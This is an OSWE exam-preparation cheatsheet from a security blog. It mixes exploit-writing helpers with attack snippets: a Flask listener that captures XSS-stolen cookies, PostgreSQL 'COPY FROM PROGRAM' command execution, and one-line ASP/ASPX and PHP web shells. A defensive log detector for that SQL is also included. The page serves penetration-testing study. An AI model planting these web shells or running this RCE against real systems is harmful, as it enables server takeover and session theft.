OSWE Cheatsheet

Review

https://decriptosec.com/oswe-review

Practice machines

https://github.com/bmdyy/tudo

https://github.com/bmdyy/order

https://www.vulnhub.com/entry/securecode-1,651

https://github.com/bmdyy/testr

https://github.com/bmdyy/chat.js

https://www.vulnhub.com/entry/potato-1,529

https://www.vulnhub.com/entry/raven-2,269

Exploit skeleton

Requests

import requests

webSess = requests.Session()

def post(url, data):
	return webSess.post(url, data=data)

def get(url):
	return webSess.get(url)

Capturing cookies via XSS

import flask

app = flask.Flask(__name__)

@app.route('/rotaxss')
def minha_rota():
  # value arrives in the "cookie" query parameter of the callback request
  hijack = flask.request.args.get('cookie')
  print(hijack)
  # todo
  # Flask requires a response object; an empty body is enough here
  return ''

app.run(host="0.0.0.0", port=80)

Reverse shell

https://github.com/welk1n/ReverseShell-Java

PayloadAllTheThings

Python Threads

# example of running a function with arguments in another thread
from time import sleep
from threading import Thread
 
# a custom function that blocks for a moment
def task(sleep_time, message):
    # block for a moment
    sleep(sleep_time)
    # display a message
    print(message)
 
# create a thread
thread = Thread(target=task, args=(1.5, 'New message from another thread'))
# run the thread
thread.start()
# wait for the thread to finish
print('Waiting for the thread...')
thread.join()

Xfreerdp Custom Resolution

xfreerdp /u:user /p:pass /v:IP /size:1280x1024

WebSocket Python

#!/usr/bin/python3
import sys
from websocket import create_connection

# target host taken from the first argument (assumption: the original snippet
# used srvip without defining it)
srvip = sys.argv[1]

wsurl = 'ws://%s/socket.io/?EIO=3&transport=websocket&t=DEA3af&sid=' % srvip
ws = create_connection(wsurl)
print(ws.recv())
print(ws.recv())

def send_data(data, expectStr):
    # send one socket.io frame and read until the expected marker comes back
    ws.send(data)
    while True:
        tmp = ws.recv()
        if expectStr in tmp:
            return tmp

data = '42["login",{"email":"teste@teste.com","password":"123"}]'
print(send_data(data, 'Success'))

Encoding text as hexadecimal escapes (e.g. \x5f\x35…)

http://www.mynikko.com/tools/tool_jsescaper.html

Escaping strings that contain many quotes

https://onlinestringtools.com/escape-string

PostgreSQL RCE

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;

Enabling debug output

MySQL

$ sudo nano /etc/mysql/my.cnf
[mysqld]
...
general_log_file        = /var/log/mysql/mysql.log
general_log             = 1

$ sudo systemctl restart mysql
$ sudo tail -f /var/log/mysql/mysql.log

PHP

$ sudo nano /etc/php5/apache2/php.ini

display_errors = On

PostgreSQL Windows

1 – Edit: C:\Program Files (x86)\ManageEngine\AppManager12\working\pgsql\data\amdb\postgresql.conf

2 – Uncomment: log_statement = 'all' # none, ddl, mod, all

3 – Go to C:\Program Files (x86)\ManageEngine\AppManager12\working\pgsql\data\amdb\pgsql_log\

PostgreSQL Linux

https://tableplus.com/blog/2018/10/how-to-show-queries-log-in-postgresql.html
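Once log_statement = 'all' is on, the same log that helps you trace an application's queries also records a COPY ... FROM PROGRAM call like the one in the PostgreSQL RCE snippet above. The detector below is an added example (not from the original post) that scans constructed log lines in the default PostgreSQL stderr format and flags every COPY statement that hands a command to the OS; the log format and PIDs are assumptions.

```python
import re

# Constructed sample lines in PostgreSQL's default stderr log format,
# as written when log_statement = 'all' (assumed format, not from the page).
SAMPLE_LOG = """\
2024-05-01 10:00:01 UTC [2311] LOG:  statement: SELECT * FROM users WHERE id = 3
2024-05-01 10:00:02 UTC [2311] LOG:  statement: DROP TABLE IF EXISTS cmd_exec;
2024-05-01 10:00:02 UTC [2311] LOG:  statement: CREATE TABLE cmd_exec(cmd_output text);
2024-05-01 10:00:03 UTC [2311] LOG:  statement: COPY cmd_exec FROM PROGRAM 'id';
2024-05-01 10:00:03 UTC [2311] LOG:  statement: SELECT * FROM cmd_exec;
2024-05-01 10:00:09 UTC [2312] LOG:  statement: copy data from '/tmp/in.csv';
"""

# COPY ... FROM/TO PROGRAM runs a shell command as the postgres OS user; only
# superusers or members of pg_execute_server_program may issue it, so any hit
# coming from an application role deserves an alert.
COPY_PROGRAM = re.compile(
    r"statement:\s*COPY\s+(?P<table>\S+)\s+(?:FROM|TO)\s+PROGRAM\s+'(?P<cmd>[^']*)'",
    re.IGNORECASE,
)
PID_RE = re.compile(r"\[(?P<pid>\d+)\]")

def find_copy_program(log_text):
    """Return one dict per COPY ... PROGRAM statement found in log_text."""
    hits = []
    for line in log_text.splitlines():
        m = COPY_PROGRAM.search(line)
        if not m:
            continue  # ordinary statements and plain file COPYs are ignored
        pid = PID_RE.search(line)
        hits.append({
            "pid": pid.group("pid") if pid else None,
            "table": m.group("table"),
            "command": m.group("cmd"),
            "line": line,
        })
    return hits

if __name__ == "__main__":
    for hit in find_copy_program(SAMPLE_LOG):
        print("[!] backend %s ran OS command %r via COPY on table %s"
              % (hit["pid"], hit["command"], hit["table"]))
```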

Using regular expressions

https://decriptosec.com/utilizando-expressoes-regulares-para-auxiliar-no-seu-pentest-white-box-oswe-e-appsec

SMTP server

sudo python3 -m smtpd -n -c DebuggingServer 0.0.0.0:25

One-line RCE

ASP/ASPX

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

<% eval request("cmd") %>

PHP

<?=`$_GET[0]`?>

Stylish logs xD

class PepperLogger:
    @staticmethod
    def log_info(txt):
        print('[•] ' + txt)

    @staticmethod
    def log_error(txt):
        print('[-] ' + txt)

    @staticmethod
    def log_warning(txt):
        print('[!] ' + txt)

    @staticmethod
    def log_success(txt):
        print('[+] ' + txt)

Burp Copy As Python

https://portswigger.net/bappstore/b324647b6efa4b6a8f346389730df160


Copyright © 2024, Decripto.